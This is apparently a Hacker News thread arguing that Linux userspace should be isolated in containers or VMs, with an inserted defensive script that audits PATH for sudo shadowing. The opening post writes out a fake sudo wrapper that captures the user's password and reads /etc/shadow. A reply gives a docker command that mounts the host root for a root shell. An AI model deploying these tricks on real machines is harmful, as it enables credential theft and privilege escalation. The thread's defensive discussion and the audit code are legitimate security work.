Hacker News

sergeykish, today at 10:26 AM

Linux distributions do not need Copy Fail to get root access:

    echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc

    mkdir -p .local/bin/
    cat <<EOF >.local/bin/sudo
    read -rs -p "[sudo] password for $USER: " PASSWORD
    echo ""
    echo "$PASSWORD" | /usr/bin/sudo -S head /etc/shadow
    EOF

    chmod +x .local/bin/sudo
Attack on the next sudo call shows data accessible only to root.

Our security model is based on distributions verifying packages, that is, distro maintainers. Software we can't trust should be running in VMs. The attack on trivy is just the beginning, and the solution is removing pip, uv, npm, rbenv from the host and running them in docker containers:

    $ docker run -it -v.:/app -w /app node:alpine /bin/sh
Long-term environments are defined in docker compose:

    # docker-compose.yml
    services:
      app:
        image: node:alpine
        volumes:
          - .:/app
        working_dir: /app
        command: /bin/sh

    $ docker compose run app
Switch to Kata etc. if more protection is needed. Eventually all userspace would run in VMs.
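A defender's check for the precondition of the PATH-shadowing trick in the post above, as an added example that is not from the thread: it walks a PATH string and, for every entry that comes before the directory holding the real sudo, reports whether the entry is writable by the current user (a wrapper could be planted there) and whether an executable named `sudo` already sits there (shadowing is happening now). The PATH value and the real sudo location are passed in as arguments, which is an assumption made so the function can be run against a constructed PATH on a machine without sudo.

```shell
#!/bin/sh
# Added example, not code from the thread.
# audit_sudo_path PATH_VALUE [REAL_SUDO]
#   Prints one line per finding for entries that precede the real sudo's directory:
#     W <dir>        entry is writable by the current user
#     S <dir>/sudo   an executable named sudo exists there and would win the lookup
#   REAL_SUDO defaults to /usr/bin/sudo (assumed location on most distributions).
audit_sudo_path() {
  path_value="$1"
  real_sudo="${2:-/usr/bin/sudo}"
  real_dir=$(dirname "$real_sudo")
  old_ifs=$IFS
  IFS=:
  for dir in $path_value; do
    [ -n "$dir" ] || dir=.             # an empty PATH entry means the current directory
    [ "$dir" = "$real_dir" ] && break  # entries after the real sudo cannot shadow it
    [ -w "$dir" ] && echo "W $dir"
    [ -x "$dir/sudo" ] && echo "S $dir/sudo"
  done
  IFS=$old_ifs
  return 0
}

# Stand-alone run: audit the live PATH against /usr/bin/sudo.
audit_sudo_path "$PATH"
```

An entry like `$HOME/.local/bin` prepended by `.bashrc` will show up as `W`, and as `S` once a wrapper has been dropped there.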

Replies

quectophoton, today at 11:21 AM

If `docker` is already there, why even bother with `sudo` when you can just:

    docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
Chances are that the person who set up Docker didn't do it properly.